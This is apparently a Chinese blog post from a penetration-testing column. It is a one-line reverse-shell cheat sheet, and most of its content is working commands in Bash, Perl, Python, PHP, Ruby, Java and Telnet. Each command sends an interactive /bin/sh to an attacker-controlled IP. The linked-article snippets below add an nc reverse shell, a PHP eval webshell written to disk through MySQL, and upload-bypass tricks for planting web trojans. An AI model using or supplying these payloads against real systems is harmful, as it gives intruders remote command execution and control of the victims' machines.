各种语言一句话反弹shell

最新推荐文章于 2024-08-10 00:14:14 发布

PD_3569

最新推荐文章于 2024-08-10 00:14:14 发布

阅读量1k

点赞数 1

分类专栏：渗透

渗透专栏收录该内容

59 篇文章 11 订阅

订阅专栏

Bash [不通用，跟linux发行版本有关，在ubuntu上测试成功]

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet

 rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

PD_3569

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

一句话木马拿Shell与菜刀原理

悦分享

07-12

1548

1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马，不行就加个空格或是利用IIS6.0解析漏洞，常见格式：1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马，居然被程序检测拦截了，右键记事本打开木马，在代码最前面加上gif89a，再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马，复制地址到数据库备份备份成asp格式木马，有时不成功的话，就利用IIs6.0解析漏洞，格式：1.asp;

内网渗透-常用反弹shell方法总结

lza20001103的博客

08-28

4729

常用反弹shell方法总结文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt

参与评论您还未登录，请先登录后发表或查看评论

webshell一句话

08-26

php,jsp,asp等脚本的常用一句话拿webshell，然后用菜刀连接即可

Reverse Shell Cheat Sheet

天元喜羊羊的博客

07-06

863

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll

Linux反弹Shell的多种技巧

热门推荐

qq_45584159的博客

03-04

1万+

文章目录一.什么是反弹shell，以及对反弹shell作用原理的解析：3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析：>&、&>常见linux提权一.什么是反弹shell，以及对反弹shell作用原理的解析： 1.定义通俗来说，shell就是实现用户命令的接口，通过该接口我们能实现对计算机的控制(root权限)，而反弹shell就是将shell反弹给攻击者

CVE-2010-2816 复现+反弹shell

weixin_45695535的博客

05-03

1874

整体过程漏洞描述一、复现过程环境复现1.解密2.根据js找到加密逻辑反弹shell1.一句话木马方式2.计划任务反弹shell参考文章漏洞描述 Adobe ColdFusion 是美国 Adobe 公司的一款动态 Web 服务器产品，其运行的 CFML（ColdFusion Markup Language）是针对 Web 应用的一种程序设计语言。 Adobe ColdFusion 8、9 版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。一、复现过程环境一台攻击机(kali-20

scripts:各种语言的脚本的集合

05-21

剧本该存储库包含我编写的脚本的集合。脚本具有多种语言。

一句话反弹shell

Jim的博客

08-21

4560

1.Bash: •bash–i >&/dev/tcp/10.0.0.1/80800>&1 //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中，0>&1将标准输入重定向到标准输出中。 •Linuxshell文件描述符： •1.标准输入：代码为0，使用 •2.标准输出：代码为1，使用>或>>; •3.标准错误输出：

java反弹shell

a807719447的专栏

01-26

2042

import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="xx.xx.xx.xx"; int port=9001; String cmd="/bi.

一句话shell命令

weixin_34189116的博客

10-13

204

1、清空以log文件结尾的文件内容 find.-typef-name"*.log"-execcp/dev/null{}\; 转载于:https://blog.51cto.com/caozm/1563206

Linux反弹shell（一）文件描述符与重定向

Hunt Counter

10-24

360

0X00 前言由于在反弹shell的过程中有一些精简的语句一直没有弄明白，今天特意写文章总结这里面最难的文件描述符和重定向的部分。 0X01 文件描述符 linux文件描述符：可以理解为linux跟踪打开文件，而分配的一个数字，这个数字有点类似c语言操作文件时候的句柄，通过句柄就可以实现文件的读写操作。当Linux启动的时候会默认打开三个文件描述符，分别是：标准输入standard inpu...

一句话shell【php】

weixin_30497527的博客

03-31

630

1.mysql执行语句拿shell Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'E:\\phpStudy\\PHPTutorial\\WWW\\test.php'; ...

C/C++编写的反向SHELL

hambaga的博客

04-08

2076

转载来源： https://www.nulled.to/topic/87972-custom-windows-reverse-shell-backdoor-written-in-c/ http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/ 下面是我根据原文的修改，将命令行指定ip端口改为写死。将原文多字节编码改为Unicode编码。 ...

反弹shell

G653214的博客

12-15

285

反弹 shell的几种方式 linux文件描述符：linux shell下有三种标准的文件描述符，分别如下：文件描述符缩写描述 0 STDIN 标准输入 1 STDOUT 标准输出 2 STDERR 标准错误输出 bash反弹 shell 靶机： bash -I >&/dev/tcp/192.168.1.1/9999 0>&1 攻击机： nc -nvlp 9999 命令注入直接获..

一句话反弹shell代码

09-10

### 回答1： "bash -i >& /dev/tcp/IP地址/端口号 0>&1"。这是一句简单的 Bash 命令，用于在远程主机上打开一个反弹 shell。它使用了 Bash 的内置命令 "bash -i" 来启动一个交互式 shell，并使用 ">&" 和 "/dev/tcp/IP地址/端口号" 来将 shell 的输入和输出重定向到远程主机上的指定 IP 地址和端口。这样，你就可以在远程主机上运行命令并获得输出，就像在本地 shell 中一样。注意：使用反弹 shell 是一种非常危险的操作，应该只在拥有合法权限的情况下使用。如果你在没有合法权限的情况下使用反弹 shell，你可能会触犯法律。 ### 回答2：反弹shell代码是指通过在目标计算机上执行恶意代码，将计算机中的shell连接会话转移到攻击者控制的远程服务器上。这样，攻击者就能够远程控制目标计算机。一句话反弹shell代码是一种常见的恶意代码，攻击者通常通过利用漏洞将这段代码注入到目标服务器的Web应用程序中。以下是一个简单的一句话反弹shell代码的示例： ``` <?php $sock=fsockopen("攻击者的IP地址",攻击者的端口);shell_exec("/bin/sh -i <&3 >&3 2>&3");?> ``` 以上代码中，“攻击者的IP地址”需要替换为攻击者服务器的实际IP地址，“攻击者的端口”需要替换为攻击者服务器监听的实际端口。当目标服务器上的Web应用程序执行包含以上代码的恶意请求时，它将尝试与攻击者的服务器建立连接。一旦成功连接，攻击者就可以通过与目标计算机建立的连接会话执行命令、获取敏感信息或者进行其他恶意活动。使用这种方式执行恶意代码是非法的，并且对网络安全造成威胁。为了保护网络安全，服务器管理员需要定期更新软件和系统补丁，同时对输入进行有效的过滤和验证，以防止类似的攻击。 ### 回答3：反弹shell代码是一种利用网络连接远程控制目标操作系统的方法。以下是一个300字的中文回答：反弹shell代码是一种用于在网络中远程控制目标操作系统的技术，可以实现向目标计算机发送命令并接收返回结果。该代码通常被黑客用于非法活动，因此对于正当目的者来说，了解反弹shell代码的原理和方法是非常重要的。反弹shell代码的基本原理是将一个后门程序或指令嵌入到目标系统中，使得黑客可以通过网络连接远程操控目标系统。当黑客成功地将后门程序或指令嵌入到目标系统后，他们就能够通过特定的网络端口或协议监听并等待一个连接。一旦有连接建立，黑客就能够与目标系统建立通信，并发送命令执行特定的操作。反弹shell代码常见的用途包括获取目标系统的敏感信息、执行某些操作以获取非法利益或破坏目标系统的安全性。因此，了解反弹shell代码以及如何防范其攻击是非常重要的。对于普通用户来说，保持操作系统和软件的最新补丁、不安全网站、可疑附件和链接、避免打开来历不明的文件等都是预防黑客利用反弹shell代码攻击的有效方法。总而言之，反弹shell代码是一种通过网络连接远程控制目标操作系统的技术。对于黑客来说，它是一种非法的工具，但对于系统管理员和安全专家来说，了解其原理和如何防范攻击是非常重要的。通过采取适当的安全措施，我们可以减少反弹shell代码对我们系统的威胁。